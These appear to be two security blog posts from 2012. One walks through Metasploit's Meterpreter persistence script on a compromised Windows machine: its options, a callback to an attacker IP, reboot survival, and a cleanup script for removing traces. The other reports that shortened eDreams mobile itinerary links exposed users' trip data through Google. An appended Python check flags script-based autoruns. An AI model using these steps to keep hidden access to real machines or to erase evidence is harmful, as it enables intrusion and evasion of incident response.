Tuesday, 20 March 2012

Owned forever


Some days ago I read something about the Meterpreter modules that can be run once a machine has been compromised, but I can't remember where. So I want to talk about the use of some of them.

First of all, there are a lot of scripts to run (about 180), and they cover actions such as collecting the credentials stored on the system or in the installed software.

Another option is to make our connection persistent and keep that channel available for future connections. To do that, we use the "persistence" script. To see its options, run "run persistence -h":

With that script we create a service on the compromised machine that will be ready every time the server is rebooted.

To explain how it works, we need to know its options:

-A Automatically start a matching multi/handler to connect to the agent
-L Location in target host where to write payload to, if none %TEMP% will be used.
-P Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back

I will use the options "-A", "-S", "-X", "-p 4445" and "-r 192.168.0.182". As we can see in the following image, a new session has been created, and we can also see where the VBS script has been stored and that it is running under a new process ID (PID).

If we want to check that the channel is now persistent, we reboot the owned computer: the active sessions die, and once the computer has booted it will try to connect back to our multi/handler.


To clean up our traces, we must delete the files that were created and kill the current process. When we ran the "persistence" script for the first time, a cleanup script was created at /root/.msf4/logs/persistence/*.rc. We must change the PID in that script and move the kill command to the end, because if it runs before the other commands the connection dies and it is no longer possible to delete the registry key.

Finally, we run the "resource" command in Meterpreter to execute the cleanup script.

Some errors may appear when running the resource command, but the only acceptable ones are the error when trying to delete the payload created on the system (only if we didn't change the path and the script was created in the %TEMP% directory, because that script is deleted when the machine reboots) and the error when trying to kill the process, for the same reason.
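From the defender's side, the artifacts described above (a .vbs payload dropped in %TEMP% and started at boot from the registry or as a service) are easy to look for in an autorun export. The following Python check is an added example, not code from the post or from Metasploit; the autorun entries are constructed samples in the shape of exported Run-key values and service ImagePath values.

```python
import re

# Constructed sample of autorun entries (source, name, command), in the shape a
# defender might export from the HKLM/HKCU Run keys and from service ImagePath
# values. These values are made up for the example and are not from the post.
SAMPLE_AUTORUNS = [
    ("registry_run", "OneDrive",
     r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    ("registry_run", "vUpdater",
     r"cscript.exe //nologo C:\Users\alice\AppData\Local\Temp\hgHjkLm.vbs"),
    ("service", "Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("service", "UpdSvc", r"wscript.exe C:\Windows\TEMP\rQzPaWd.vbs"),
    ("service", "LegitVbsSvc", r"C:\Program Files\Vendor\monitor.vbs"),
]

# A path component named Temp or Tmp, and a .vbs script anywhere in the command.
TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
VBS_RE = re.compile(r"\.vbs\b", re.IGNORECASE)


def classify(command):
    """Return the reasons an autorun command resembles script-based persistence."""
    reasons = []
    if VBS_RE.search(command):
        reasons.append("runs a .vbs script")
    if TEMP_DIR_RE.search(command):
        reasons.append("payload lives in a temp directory")
    return reasons


def suspicious_autoruns(entries, min_score=2):
    """Flag entries that accumulate at least `min_score` reasons.

    A lone .vbs under Program Files scores 1 and is left alone; a .vbs in a
    temp directory scores 2, which is the pattern the persistence script leaves.
    """
    hits = []
    for source, name, command in entries:
        reasons = classify(command)
        if len(reasons) >= min_score:
            hits.append((source, name, "; ".join(reasons)))
    return hits


if __name__ == "__main__":
    for source, name, why in suspicious_autoruns(SAMPLE_AUTORUNS):
        print(f"[{source}] {name}: {why}")
```

Lowering `min_score` to 1 also surfaces every .vbs autorun regardless of location, which is noisier but useful as a first triage pass.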

Wednesday, 7 March 2012

Careful what they cache on you... and not at airports


A few days ago I bought a plane ticket and received on my phone an SMS from eDreams with a URL shortened with TinyURL, so that if I open it from the phone it shows me the itinerary information for that purchase.

The problem was that I didn't visit the page from my phone, but from my computer with a normal browser... And when I "un-shortened" the URL, it took me straight into the mobile application, with the "itinerary" data for my user.

The URL generated to get in looks like this:
http://m.edreams.es/Mobile/b2aeb0a0****************

So... why not check whether similar content shows up on Google?

Well, the answer is yes: there is at least one result that gives access to an eDreams user's itineraries, where 3 of their upcoming trips can be seen.


Unfortunately... it only allows viewing... no name changes or anything juicier like that ;)